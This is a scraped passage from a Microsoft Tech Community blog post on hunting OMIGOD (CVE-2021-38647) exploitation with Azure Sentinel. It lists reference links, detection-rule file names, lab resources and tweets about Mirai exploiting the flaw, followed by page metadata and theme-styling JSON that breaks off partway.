Azure Security Center Guidance:
\n
\n
Using ASC to find machines affected by OMI vulnerabilities in Azure VM Management Extensions - Microsoft Tech
Community
\n
\n
Sentinel Detections:
\n
\n
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 19 of 38

Azure-Sentinel/NetworkConnectiontoOMIPorts.yaml at master · Azure/Azure-Sentinel · GitHub
\n
Azure-Sentinel/OMIGODVulnerableMachines.yaml at master · Azure/Azure-Sentinel · GitHub
\n
Azure-Sentinel/SCXExecuteRunAsProviders.yml at master · Azure/Azure-Sentinel (github.com) [updated Sept 24,
2021]
\n
\n
Software and tools:
\n
\n
GitHub - microsoft/SCXcore: System Center Cross Platform Provider for Operations Manager
\n
GitHub - microsoft/Build-omi: Build projects required for OMI (Open Management Infrastructure)
\n
\n
Research lab environments:
\n
\n
Azure-Sentinel2Go/grocery-list/Linux/demos/CVE-2021-38647-OMI at master · OTRF/Azure-Sentinel2Go
(github.com)
\n
\n\n
Public Discussion About Attacks in the wild:
\n
\n
chris doman on Twitter: \"OMIGOD (CVE-2021-38647) is now under active exploitation We took at a look at one of
the first samples - yup, it's Mirai! If you're running Linux on Azure, check to see if OMI is installed
https://t.co/o3nr82RgH1 https://t.co/kbbt1T52d3\" / Twitter
\n
Andrew Morris on Twitter: \"The Azure \"OHMIGOD\" vulnerability (CVE-2021-38647) is increasing a good bit.
~10 IPs opportunistically exploiting the vuln across the internet this morning, ~80 now. Tags available to all GN
users and customers now. GNQL: cve:CVE-2021-38647 https://t.co/sbdxJxzrEd https://t.co/7dyU213Pl1\" / Twitter
\n
Kevin Beaumont on Twitter: \"Oh Mirai fixed their binary, it now supports proper OMIGOD exploitation. Given
Mirai can enter networks and spread laterally via multiple vulns, this might be problematic.
https://t.co/8nXSEcMHYa\" / Twitter
\n
\n","kudosSumWeight":5,"postTime":"2021-09-18T15:57:42.783-07:00","images":
{"__typename":"AssociatedImageConnection","edges":
[{"__typename":"AssociatedImageEdge","cursor":"MjYuMXwyLjF8b3wyNXxfTlZffDE","node":
{"__ref":"AssociatedImage:
{\"url\":\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyNWk5QzZDODY2OTQ2NjRBNjA0?
revision=25\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjYuMXwyLjF8b3wyNXxfTlZffDI","node":
{"__ref":"AssociatedImage:
{\"url\":\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyOGk0MDFFNjFGQ0YxODU5RkRE?
revision=25\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjYuMXwyLjF8b3wyNXxfTlZffDM","node":
{"__ref":"AssociatedImage:
{\"url\":\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyN2kyMDBFREUxMEZGNTJEM0U5?
revision=25\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjYuMXwyLjF8b3wyNXxfTlZffDQ","node":
{"__ref":"AssociatedImage:
{\"url\":\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyNmk1RUZENDg3OTNCMDg5M0ZG?
revision=25\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjYuMXwyLjF8b3wyNXxfTlZffDU","node":
{"__ref":"AssociatedImage:
{\"url\":\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyOWlFRTdDQUE5RkVBNjUwQkE5?
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 20 of 38

revision=25\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjYuMXwyLjF8b3wyNXxfTlZffDY","node":
{"__ref":"AssociatedImage:
{\"url\":\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMzMGk1OUIxM0JCOUZFMTZGQkQw?
revision=25\"}"}}],"totalCount":6,"pageInfo":
{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"attachments":
{"__typename":"AttachmentConnection","pageInfo":
{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null},"edges":
[]},"tags":{"__typename":"TagConnection","pageInfo":
{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null},"edges":
[{"__typename":"TagEdge","cursor":"MjYuMXwyLjF8b3wxMHxfTlZffDE","node":
{"__typename":"Tag","id":"tag:hunting","text":"hunting","time":"2019-04-11T09:00:00.012-
07:00","lastActivityTime":null,"messagesCount":null,"followersCount":null}},
{"__typename":"TagEdge","cursor":"MjYuMXwyLjF8b3wxMHxfTlZffDI","node":
{"__typename":"Tag","id":"tag:microsoft sentinel","text":"microsoft sentinel","time":"2021-11-02T10:33:48.383-
07:00","lastActivityTime":null,"messagesCount":null,"followersCount":null}}]},"timeToRead":8,"rawTeaser":"\n\n
Microsoft Threat Intelligence Center (MSTIC) have been monitoring for signs of exploitation of the OMI vulnerability and
investigating detections to further protect customers.
","introduction":"","coverImage":null,"coverImageProperties":
{"__typename":"CoverImageProperties","style":"STANDARD","titlePosition":"BOTTOM","altText":""},"currentRevision":
{"__ref":"Revision:revision:2764093_25"},"latestVersion":
{"__typename":"FriendlyVersion","major":"11","minor":"0"},"metrics":
{"__typename":"MessageMetrics","views":254181},"read":false,"visibilityScope":"PUBLIC","canonicalUrl":null,"seoTitle":null,"seoDescription":null,"p
{"__typename":"UserConnection","edges":[]},"nonCoAuthorContributors":{"__typename":"UserConnection","edges":
[]},"coAuthors":{"__typename":"UserConnection","edges":[]},"blogMessagePolicies":
{"__typename":"BlogMessagePolicies","canDoAuthoringActionsOnBlog":{"__typename":"PolicyResult","failureReason":
{"__typename":"FailureReason","message":"error.lithium.policies.blog.action_can_do_authoring_action.accessDenied","key":"error.lithium.policies.blog
[]}}},"archivalData":null,"customFields":[],"revisions({\"constraints\":{\"isPublished\":{\"eq\":true}}})":
{"__typename":"RevisionConnection","totalCount":25}},"Conversation:conversation:2764093":
{"__typename":"Conversation","id":"conversation:2764093","solved":false,"topic":
{"__ref":"BlogTopicMessage:message:2764093"},"lastPostingActivityTime":"2021-11-03T04:04:57.678-
07:00","lastPostTime":"2021-09-26T23:20:10.247-
07:00","unreadReplyCount":3,"isSubscribed":false},"ModerationData:moderation_data:2764093":
{"__typename":"ModerationData","id":"moderation_data:2764093","status":"APPROVED","rejectReason":null,"isReportedAbuse":false,"rejectUser":nu
{\"url\":\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyNWk5QzZDODY2OTQ2NjRBNjA0?
revision=25\"}":
{"__typename":"AssociatedImage","url":"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyNWk5QzZDODY
revision=25","title":"nmap.png","associationType":"TEASER","width":530,"height":193,"altText":null},"AssociatedImage:
{\"url\":\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyOGk0MDFFNjFGQ0YxODU5RkRE?
revision=25\"}":
{"__typename":"AssociatedImage","url":"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyOGk0MDFFNjFG
revision=25","title":"russmc_0-
1632000577051.png","associationType":"BODY","width":2540,"height":1067,"altText":null},"AssociatedImage:
{\"url\":\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyN2kyMDBFREUxMEZGNTJEM0U5?
revision=25\"}":
{"__typename":"AssociatedImage","url":"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyN2kyMDBFREU
revision=25","title":"russmc_1-
1632000577059.png","associationType":"BODY","width":1496,"height":214,"altText":null},"AssociatedImage:
{\"url\":\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyNmk1RUZENDg3OTNCMDg5M0ZG?
revision=25\"}":
{"__typename":"AssociatedImage","url":"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyNmk1RUZENDg
revision=25","title":"russmc_2-
1632000577065.png","associationType":"BODY","width":679,"height":278,"altText":null},"AssociatedImage:
{\"url\":\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyOWlFRTdDQUE5RkVBNjUwQkE5?
revision=25\"}":
{"__typename":"AssociatedImage","url":"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMyOWlFRTdDQUE
revision=25","title":"russmc_3-
1632000577069.png","associationType":"BODY","width":1205,"height":316,"altText":null},"AssociatedImage:
{\"url\":\"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMzMGk1OUIxM0JCOUZFMTZGQkQw?
revision=25\"}":
{"__typename":"AssociatedImage","url":"https://techcommunity.microsoft.com/t5/s/gxcuf89792/images/bS0yNzY0MDkzLTMxMTMzMGk1OUIxM0JC
revision=25","title":"russmc_4-
1632000577071.png","associationType":"BODY","width":508,"height":141,"altText":null},"Revision:revision:2764093_25":
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 21 of 38

{"__typename":"Revision","id":"revision:2764093_25","lastEditTime":"2021-11-03T04:04:57.678-
07:00"},"CachedAsset:theme:customTheme1-1774591513337":{"__typename":"CachedAsset","id":"theme:customTheme1-
1774591513337","value":{"id":"customTheme1","animation":
{"fast":"150ms","normal":"250ms","slow":"500ms","slowest":"750ms","function":"cubic-bezier(0.07, 0.91, 0.51,
1)","__typename":"AnimationThemeSettings"},"avatar":{"borderRadius":"50%","collections":
["default"],"__typename":"AvatarThemeSettings"},"basics":{"browserIcon":{"imageAssetName":"favicon-1730836283320.png","imageLastModified":"1730836286415","__typename":"ThemeAsset"},"customerLogo":
{"imageAssetName":"favicon-1730836271365.png","imageLastModified":"1730836274203","__typename":"ThemeAsset"},"maximumWidthOfPageContent":"1300px","oneColumnN
{"borderRadiusSm":"3px","borderRadius":"3px","borderRadiusLg":"5px","paddingY":"5px","paddingYLg":"7px","paddingYHero":"var(-
-lia-bs-btn-padding-y-lg)","paddingX":"12px","paddingXLg":"16px","paddingXHero":"60px","fontStyle":"NORMAL","fontWeight":"700","textTransform":"NONE","disabled
-lia-bs-white)","primaryTextHoverColor":"var(--lia-bs-white)","primaryTextActiveColor":"var(--lia-bs-white)","primaryBgColor":"var(--lia-bs-primary)","primaryBgHoverColor":"hsl(var(--lia-bs-primary-h), var(--lia-bs-primary-s), calc(var(--lia-bs-primary-l) * 0.85))","primaryBgActiveColor":"hsl(var(--lia-bs-primary-h), var(--lia-bs-primary-s), calc(var(--lia-bs-primary-l) * 0.7))","primaryBorder":"1px solid transparent","primaryBorderHover":"1px solid
transparent","primaryBorderActive":"1px solid transparent","primaryBorderFocus":"1px solid var(--lia-bs-white)","primaryBoxShadowFocus":"0 0 0 1px var(--lia-bs-primary), 0 0 0 4px hsla(var(--lia-bs-primary-h), var(--lia-bs-primary-s), var(--lia-bs-primary-l), 0.2)","secondaryTextColor":"var(--lia-bs-gray-900)","secondaryTextHoverColor":"hsl(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), calc(var(--lia-bs-gray-900-l) *
0.95))","secondaryTextActiveColor":"hsl(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), calc(var(--lia-bs-gray-900-l) *
0.9))","secondaryBgColor":"var(--lia-bs-gray-200)","secondaryBgHoverColor":"hsl(var(--lia-bs-gray-200-h), var(--lia-bs-gray-200-s), calc(var(--lia-bs-gray-200-l) * 0.96))","secondaryBgActiveColor":"hsl(var(--lia-bs-gray-200-h), var(--lia-bs-gray-200-s), calc(var(--lia-bs-gray-200-l) * 0.92))","secondaryBorder":"1px solid
transparent","secondaryBorderHover":"1px solid transparent","secondaryBorderActive":"1px solid
transparent","secondaryBorderFocus":"1px solid transparent","secondaryBoxShadowFocus":"0 0 0 1px var(--lia-bs-primary), 0 0 0 4px hsla(var(--lia-bs-primary-h), var(--lia-bs-primary-s), var(--lia-bs-primary-l),
0.2)","tertiaryTextColor":"var(--lia-bs-gray-900)","tertiaryTextHoverColor":"hsl(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), calc(var(--lia-bs-gray-900-l) * 0.95))","tertiaryTextActiveColor":"hsl(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-
s), calc(var(--lia-bs-gray-900-l) *
0.9))","tertiaryBgColor":"transparent","tertiaryBgHoverColor":"transparent","tertiaryBgActiveColor":"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.04)","tertiaryBorder":"1px solid
transparent","tertiaryBorderHover":"1px solid hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l),
0.08)","tertiaryBorderActive":"1px solid transparent","tertiaryBorderFocus":"1px solid
transparent","tertiaryBoxShadowFocus":"0 0 0 1px var(--lia-bs-primary), 0 0 0 4px hsla(var(--lia-bs-primary-h), var(--lia-bs-primary-s), var(--lia-bs-primary-l), 0.2)","destructiveTextColor":"var(--lia-bs-danger)","destructiveTextHoverColor":"hsl(var(--lia-bs-danger-h), var(--lia-bs-danger-s), calc(var(--lia-bs-danger-l) *
0.95))","destructiveTextActiveColor":"hsl(var(--lia-bs-danger-h), var(--lia-bs-danger-s), calc(var(--lia-bs-danger-l) *
0.9))","destructiveBgColor":"var(--lia-bs-gray-200)","destructiveBgHoverColor":"hsl(var(--lia-bs-gray-200-h), var(--lia-bs-gray-200-s), calc(var(--lia-bs-gray-200-l) * 0.96))","destructiveBgActiveColor":"hsl(var(--lia-bs-gray-200-h), var(--lia-bs-gray-200-s), calc(var(--lia-bs-gray-200-l) * 0.92))","destructiveBorder":"1px solid
transparent","destructiveBorderHover":"1px solid transparent","destructiveBorderActive":"1px solid
transparent","destructiveBorderFocus":"1px solid transparent","destructiveBoxShadowFocus":"0 0 0 1px var(--lia-bs-primary), 0 0 0 4px hsla(var(--lia-bs-primary-h), var(--lia-bs-primary-s), var(--lia-bs-primary-l),
0.2)","__typename":"ButtonsThemeSettings"},"border":{"color":"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l),
0.08)","mainContent":"NONE","sideContent":"LIGHT","radiusSm":"3px","radius":"5px","radiusLg":"9px","radius50":"100vw","__typename":"BorderT
{"xs":"0 0 0 1px hsla(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), var(--lia-bs-gray-900-l), 0.08), 0 3px 0 -1px
hsla(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), var(--lia-bs-gray-900-l), 0.16)","sm":"0 2px 4px hsla(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s), var(--lia-bs-gray-900-l), 0.12)","md":"0 5px 15px hsla(var(--lia-bs-gray-900-h), var(--
lia-bs-gray-900-s), var(--lia-bs-gray-900-l), 0.3)","lg":"0 10px 30px hsla(var(--lia-bs-gray-900-h), var(--lia-bs-gray-900-s),
var(--lia-bs-gray-900-l), 0.3)","__typename":"BoxShadowThemeSettings"},"cards":{"bgColor":"var(--lia-panel-bg-color)","borderRadius":"var(--lia-panel-border-radius)","boxShadow":"var(--lia-box-shadow-xs)","__typename":"CardsThemeSettings"},"chip":
{"maxWidth":"300px","height":"30px","__typename":"ChipThemeSettings"},"coreTypes":
{"defaultMessageLinkColor":"var(--lia-bs-link-color)","defaultMessageLinkDecoration":"none","defaultMessageLinkFontStyle":"NORMAL","defaultMessageLinkFontWeight":"400","defaultMessageF
-lia-bs-font-family-base)","forumColor":"#4099E2","forumFontFamily":"var(--lia-bs-font-family-base)","forumFontWeight":"var(--lia-default-message-font-weight)","forumLineHeight":"var(--lia-bs-line-height-base)","forumFontStyle":"var(--lia-default-message-font-style)","forumMessageLinkColor":"var(--lia-default-message-link-color)","forumMessageLinkDecoration":"var(--lia-default-message-link-decoration)","forumMessageLinkFontStyle":"var(--
lia-default-message-link-font-style)","forumMessageLinkFontWeight":"var(--lia-default-message-link-font-weight)","forumSolvedColor":"#148563","blogColor":"#1CBAA0","blogFontFamily":"var(--lia-bs-font-family-base)","blogFontWeight":"var(--lia-default-message-font-weight)","blogLineHeight":"1.75","blogFontStyle":"var(--lia-https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 22 of 38

default-message-font-style)","blogMessageLinkColor":"var(--lia-default-message-link-color)","blogMessageLinkDecoration":"var(--lia-default-message-link-decoration)","blogMessageLinkFontStyle":"var(--lia-default-message-link-font-style)","blogMessageLinkFontWeight":"var(--lia-default-message-link-font-weight)","tkbColor":"#4C6B90","tkbFontFamily":"var(--lia-bs-font-family-base)","tkbFontWeight":"var(--lia-default-message-font-weight)","tkbLineHeight":"1.75","tkbFontStyle":"var(--lia-default-message-font-style)","tkbMessageLinkColor":"var(--lia-default-message-link-color)","tkbMessageLinkDecoration":"var(--lia-default-message-link-decoration)","tkbMessageLinkFontStyle":"var(--lia-default-message-link-font-style)","tkbMessageLinkFontWeight":"var(--lia-default-message-link-font-weight)","qandaColor":"#4099E2","qandaFontFamily":"var(--lia-bs-font-family-base)","qandaFontWeight":"var(--lia-default-message-font-weight)","qandaLineHeight":"var(--lia-bs-line-height-base)","qandaFontStyle":"var(--lia-default-message-link-font-style)","qandaMessageLinkColor":"var(--lia-default-message-link-color)","qandaMessageLinkDecoration":"var(--lia-default-message-link-decoration)","qandaMessageLinkFontStyle":"var(--
lia-default-message-link-font-style)","qandaMessageLinkFontWeight":"var(--lia-default-message-link-font-weight)","qandaSolvedColor":"#3FA023","ideaColor":"#FF8000","ideaFontFamily":"var(--lia-bs-font-family-base)","ideaFontWeight":"var(--lia-default-message-font-weight)","ideaLineHeight":"var(--lia-bs-line-height-base)","ideaFontStyle":"var(--lia-default-message-font-style)","ideaMessageLinkColor":"var(--lia-default-message-link-color)","ideaMessageLinkDecoration":"var(--lia-default-message-link-decoration)","ideaMessageLinkFontStyle":"var(--lia-default-message-link-font-style)","ideaMessageLinkFontWeight":"var(--lia-default-message-link-font-weight)","contestColor":"#FCC845","contestFontFamily":"var(--lia-bs-font-family-base)","contestFontWeight":"var(--lia-default-message-font-weight)","contestLineHeight":"var(--lia-bs-line-height-base)","contestFontStyle":"var(--lia-default-message-link-font-style)","contestMessageLinkColor":"var(--lia-default-message-link-color)","contestMessageLinkDecoration":"var(--lia-default-message-link-decoration)","contestMessageLinkFontStyle":"ITALIC","contestMessageLinkFontWeight":"var(--lia-default-message-link-font-weight)","occasionColor":"#bc341b","occasionFontFamily":"var(--lia-bs-font-family-base)","occasionFontWeight":"var(--lia-default-message-font-weight)","occasionLineHeight":"var(--lia-bs-line-height-base)","occasionFontStyle":"var(--lia-default-message-font-style)","occasionMessageLinkColor":"var(--lia-default-message-link-color)","occasionMessageLinkDecoration":"var(--lia-default-message-link-decoration)","occasionMessageLinkFontStyle":"var(--lia-default-message-link-font-style)","occasionMessageLinkFontWeight":"var(--lia-default-message-link-font-weight)","grouphubColor":"#333333","categoryColor":"#949494","communityColor":"#FFFFFF","productColor":"#949494","__typename":"CoreTypesT
{"black":"#000000","white":"#FFFFFF","gray100":"#F7F7F7","gray200":"#F7F7F7","gray300":"#E8E8E8","gray400":"#D9D9D9","gray500":"#CCCC
-lia-bs-primary)","custom":["#D3F5A4","#243A5E"],"__typename":"ColorsThemeSettings"},"divider":
{"size":"3px","marginLeft":"4px","marginRight":"4px","borderRadius":"50%","bgColor":"var(--lia-bs-gray-600)","bgColorActive":"var(--lia-bs-gray-600)","__typename":"DividerThemeSettings"},"dropdown":{"fontSize":"var(--
lia-bs-font-size-sm)","borderColor":"var(--lia-bs-border-color)","borderRadius":"var(--lia-bs-border-radius-sm)","dividerBg":"var(--lia-bs-gray-300)","itemPaddingY":"5px","itemPaddingX":"20px","headerColor":"var(--lia-bs-gray-700)","__typename":"DropdownThemeSettings"},"email":{"link":
{"color":"#0069D4","hoverColor":"#0061c2","decoration":"none","hoverDecoration":"underline","__typename":"EmailLinkSettings"},"border":
{"color":"#e4e4e4","__typename":"EmailBorderSettings"},"buttons":
{"borderRadiusLg":"5px","paddingXLg":"16px","paddingYLg":"7px","fontWeight":"700","primaryTextColor":"#ffffff","primaryTextHoverColor":"#fffff
solid transparent","primaryBorderHover":"1px solid transparent","__typename":"EmailButtonsSettings"},"panel":
{"borderRadius":"5px","borderColor":"#e4e4e4","__typename":"EmailPanelSettings"},"__typename":"EmailThemeSettings"},"emoji":
{"skinToneDefault":"#ffcd43","skinToneLight":"#fae3c5","skinToneMediumLight":"#e2cfa5","skinToneMedium":"#daa478","skinToneMediumDark":"#
{"color":"var(--lia-bs-body-color)","fontFamily":"Segoe
UI","fontStyle":"NORMAL","fontWeight":"400","h1FontSize":"34px","h2FontSize":"32px","h3FontSize":"28px","h4FontSize":"24px","h5FontSize":"20
-lia-bs-headings-font-weight)","h2FontWeight":"var(--lia-bs-headings-font-weight)","h3FontWeight":"var(--lia-bs-headings-font-weight)","h4FontWeight":"var(--lia-bs-headings-font-weight)","h5FontWeight":"var(--lia-bs-headings-font-weight)","h6FontWeight":"var(--lia-bs-headings-font-weight)","__typename":"HeadingThemeSettings"},"icons":
{"size10":"10px","size12":"12px","size14":"14px","size16":"16px","size20":"20px","size24":"24px","size30":"30px","size40":"40px","size50":"50px","s
{"bgColor":"var(--lia-bs-gray-900)","titleColor":"var(--lia-bs-white)","controlColor":"var(--lia-bs-white)","controlBgColor":"var(--lia-bs-gray-800)","__typename":"ImagePreviewThemeSettings"},"input":
{"borderColor":"var(--lia-bs-gray-600)","disabledColor":"var(--lia-bs-gray-600)","focusBorderColor":"var(--lia-bs-primary)","labelMarginBottom":"10px","btnFontSize":"var(--lia-bs-font-size-sm)","focusBoxShadow":"0 0 0 3px hsla(var(-
-lia-bs-primary-h), var(--lia-bs-primary-s), var(--lia-bs-primary-l),
0.2)","checkLabelMarginBottom":"2px","checkboxBorderRadius":"3px","borderRadiusSm":"var(--lia-bs-border-radius-sm)","borderRadius":"var(--lia-bs-border-radius)","borderRadiusLg":"var(--lia-bs-border-radius-lg)","formTextMarginTop":"4px","textAreaBorderRadius":"var(--lia-bs-border-radius)","activeFillColor":"var(--lia-bs-primary)","__typename":"InputThemeSettings"},"loading":{"dotDarkColor":"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.2)","dotLightColor":"hsla(var(--lia-bs-white-h), var(--lia-bs-white-s), var(--lia-bs-white-l),
0.5)","barDarkColor":"hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l),
0.06)","barLightColor":"hsla(var(--lia-bs-white-h), var(--lia-bs-white-s), var(--lia-bs-white-l),
0.4)","__typename":"LoadingThemeSettings"},"link":{"color":"var(--lia-bs-primary)","hoverColor":"hsl(var(--lia-bs-primary-h), var(--lia-bs-primary-s), calc(var(--lia-bs-primary-l) -
10%))","decoration":"none","hoverDecoration":"underline","__typename":"LinkThemeSettings"},"listGroup":
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 23 of 38

{"itemPaddingY":"15px","itemPaddingX":"15px","borderColor":"var(--lia-bs-gray-300)","__typename":"ListGroupThemeSettings"},"modal":{"contentTextColor":"var(--lia-bs-body-color)","contentBg":"var(--lia-bs-white)","backgroundBg":"var(--lia-bs-black)","smSize":"440px","mdSize":"760px","lgSize":"1080px","backdropOpacity":0.3,"contentBoxShadowXs":"var(--lia-bs-box-shadow-sm)","contentBoxShadow":"var(--lia-bs-box-shadow)","headerFontWeight":"700","__typename":"ModalThemeSettings"},"navbar":{"position":"FIXED","background":
{"attachment":null,"clip":null,"color":"var(--lia-bs-white)","imageAssetName":"","imageLastModified":"0","origin":null,"position":"CENTER_CENTER","repeat":"NO_REPEAT","size":"COVER","__typ
solid var(--lia-bs-border-color)","boxShadow":"var(--lia-bs-box-shadow-sm)","brandMarginRight":"30px","brandMarginRightSm":"10px","brandLogoHeight":"30px","linkGap":"10px","linkJustifyContent":"flex-start","linkPaddingY":"5px","linkPaddingX":"10px","linkDropdownPaddingY":"9px","linkDropdownPaddingX":"var(--lia-nav-link-px)","linkColor":"var(--lia-bs-body-color)","linkHoverColor":"var(--lia-bs-primary)","linkFontSize":"var(--lia-bs-font-size-sm)","linkFontStyle":"NORMAL","linkFontWeight":"400","linkTextTransform":"NONE","linkLetterSpacing":"normal","linkBorderRadius":"var(-
-lia-bs-border-radius-sm)","linkBgColor":"transparent","linkBgHoverColor":"transparent","linkBorder":"none","linkBorderHover":"none","linkBoxShadow":"none","linkBoxS
-lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l), 0.08)","controllerBgHoverColor":"hsla(var(--lia-bs-black-h),
var(--lia-bs-black-s), var(--lia-bs-black-l), 0.1)","controllerIconColor":"var(--lia-bs-body-color)","controllerIconHoverColor":"var(--lia-bs-body-color)","controllerTextColor":"var(--lia-nav-controller-icon-color)","controllerTextHoverColor":"var(--lia-nav-controller-icon-hover-color)","controllerHighlightColor":"hsla(30, 100%,
50%)","controllerHighlightTextColor":"var(--lia-yiq-light)","controllerBorderRadius":"var(--lia-border-radius-50)","hamburgerColor":"var(--lia-nav-controller-icon-color)","hamburgerHoverColor":"var(--lia-nav-controller-icon-color)","hamburgerBgColor":"transparent","hamburgerBgHoverColor":"transparent","hamburgerBorder":"none","hamburgerBorderHover":"none","collap
-lia-nav-link-color)","collapseMenuDividerOpacity":0.16,"__typename":"NavbarThemeSettings"},"pager":
{"textColor":"var(--lia-bs-link-color)","textFontWeight":"var(--lia-font-weight-md)","textFontSize":"var(--lia-bs-font-size-sm)","__typename":"PagerThemeSettings"},"panel":{"bgColor":"var(--lia-bs-white)","borderRadius":"var(--lia-bs-border-radius)","borderColor":"var(--lia-bs-border-color)","boxShadow":"none","__typename":"PanelThemeSettings"},"popover":
{"arrowHeight":"8px","arrowWidth":"16px","maxWidth":"300px","minWidth":"100px","headerBg":"var(--lia-bs-white)","borderColor":"var(--lia-bs-border-color)","borderRadius":"var(--lia-bs-border-radius)","boxShadow":"0 0.5rem
1rem hsla(var(--lia-bs-black-h), var(--lia-bs-black-s), var(--lia-bs-black-l),
0.15)","__typename":"PopoverThemeSettings"},"prism":{"color":"#000000","bgColor":"#f5f2f0","fontFamily":"var(--font-family-monospace)","fontSize":"var(--lia-bs-font-size-base)","fontWeightBold":"var(--lia-bs-font-weight-bold)","fontStyleItalic":"italic","tabSize":2,"highlightColor":"#b3d4fc","commentColor":"#62707e","punctuationColor":"#6f6f6f","namespaceOpacity":"
0%, 100%,
0.5)","keywordColor":"#0076a9","functionColor":"#d3284b","variableColor":"#c14700","__typename":"PrismThemeSettings"},"rte":
{"bgColor":"var(--lia-bs-white)","borderRadius":"var(--lia-panel-border-radius)","boxShadow":" var(--lia-panel-box-shadow)","customColor1":"#bfedd2","customColor2":"#fbeeb8","customColor3":"#f8cac6","customColor4":"#eccafa","customColor5":"#c2e0f4","custo
53%, 51%, 0.4)","diffChangedColor":"hsla(43, 97%, 63%, 0.4)","diffNoneColor":"hsla(0, 0%, 80%,
0.4)","diffRemovedColor":"hsla(9, 74%, 47%,
0.4)","specialMessageHeaderMarginTop":"40px","specialMessageHeaderMarginBottom":"20px","specialMessageItemMarginTop":"0","specialMessageIt
-lia-bs-gray-700)","tableBorderStyle":"solid","tableCellPaddingX":"5px","tableCellPaddingY":"5px","tableTextColor":"var(--lia-bs-body-color)","tableVerticalAlign":"middle","__typename":"RteThemeSettings"},"tags":{"bgColor":"var(--lia-bs-gray-200)","bgHoverColor":"var(--lia-bs-gray-400)","borderRadius":"var(--lia-bs-border-radius-sm)","color":"var(--lia-bs-body-color)","hoverColor":"var(--lia-bs-body-color)","fontWeight":"var(--lia-font-weight-md)","fontSize":"var(--lia-font-size-xxs)","textTransform":"UPPERCASE","letterSpacing":"0.5px","__typename":"TagsThemeSettings"},"toasts":
{"borderRadius":"var(--lia-bs-border-radius)","paddingX":"12px","__typename":"ToastsThemeSettings"},"typography":
{"fontFamilyBase":"Segoe
UI","fontStyleBase":"NORMAL","fontWeightBase":"400","fontWeightLight":"300","fontWeightNormal":"400","fontWeightMd":"500","fontWeightBold
[{"source":"SERVER","name":"Segoe UI","styles":[{"style":"NORMAL","weight":"400","__typename":"FontStyleData"},
{"style":"NORMAL","weight":"300","__typename":"FontStyleData"},
{"style":"NORMAL","weight":"600","__typename":"FontStyleData"},
{"style":"NORMAL","weight":"700","__typename":"FontStyleData"},
{"style":"ITALIC","weight":"400","__typename":"FontStyleData"}],"assetNames":["SegoeUI-normal-400.woff2","SegoeUI-normal-300.woff2","SegoeUI-normal-600.woff2","SegoeUI-normal-700.woff2","SegoeUI-italic-400.woff2"],"__typename":"CustomFont"},{"source":"SERVER","name":"MWF Fluent Icons","styles":
[{"style":"NORMAL","weight":"400","__typename":"FontStyleData"}],"assetNames":["MWFFluentIcons-normal-400.woff2"],"__typename":"CustomFont"}],"__typename":"TypographyThemeSettings"},"unstyledListItem":
{"marginBottomSm":"5px","marginBottomMd":"10px","marginBottomLg":"15px","marginBottomXl":"20px","marginBottomXxl":"25px","__typename"
{"light":"#ffffff","dark":"#000000","__typename":"YiqThemeSettings"},"colorLightness":
